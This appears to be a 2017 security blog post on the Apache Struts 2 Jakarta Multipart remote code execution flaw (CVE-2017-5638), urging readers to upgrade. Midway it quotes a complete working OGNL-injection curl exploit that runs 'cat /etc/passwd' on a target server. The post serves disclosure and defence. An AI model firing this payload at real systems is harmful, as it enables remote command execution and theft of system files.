D’oh! Another Apache Struts 2 vulnerability!
Upgrade now, some attacks are already in progress!
Another serious vulnerability was discovered in Apache Struts 2.
Affected versions
Apache Struts 2.3.5–2.3.31
Apache Struts 2.5–2.5.10
The vulnerability
The vulnerability (CVE-2017–5638), firstly reported by the security researcher Nike Zheng, is a remote code execution bug that affects the Jakarta Multipart parser in Apache Struts, as reported in this security advisory:
It is possible to perform a RCE attack with a malicious
Content-Type
value. If theContent-Type
value isn't valid an exception is thrown which is then used to display an error message to a user.
The researchers have also seen malicious attacks which turn off firewall processes on the target and drop payloads:
“The payloads have varied but include an IRC bouncer, a DoS bot, and a sample related to the bill gates botnet”.
Technical analysis was released by the major security firms:
Cisco’s Talos
Talos has also released some Snort rules that can detect exploitation attemps of the vulnerability(41818, 41819): https://snort.org/advisories/talos-rules-2017-03-07-3-7-2017.
Talos suggest to upgrade ASAP, because the researchers found
“a high number of exploitation events. The majority of the exploitation attempts seem to be leveraging a publicly released proof of concept that is being used to run various commands”.
The proof of concept was released by Qualys.
Qualys
[embed]https://threatprotect.qualys.com/2017/03/08/apache-struts-jakarta-multipart-parser-remote-code-execution-vulnerability/[/embed]
Qualsys releases the proof-of-concept that can check the vulnerability using CURL:
For our analysis, we have used below curl command to replicate the issue:
curl -i -v -s -k -X $'GET' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0' -H $'Content-Type:%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /etc/passwd').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}' $'http://10.10.36.22:8080/struts2-blank/example/HelloWorld.action'
It is important to note that the presence of vulnerable code is enough to exploit the vulnerability. The web application doesn’t necessary need to implement file upload functionality to exploit this vulnerability.
On Rapid7 GitHub repository is also available a python script to check the vulnerability:
[embed]https://github.com/rapid7/metasploit-framework/issues/8064[/embed]
[embed]https://gist.github.com/andreafortuna/23792e573fe6f72c843f8f9598db0325[/embed]
Remediations?
This vulnerability has been fixed Struts 2.3.32 and 2.5.10.1, so…upgrade ASAP!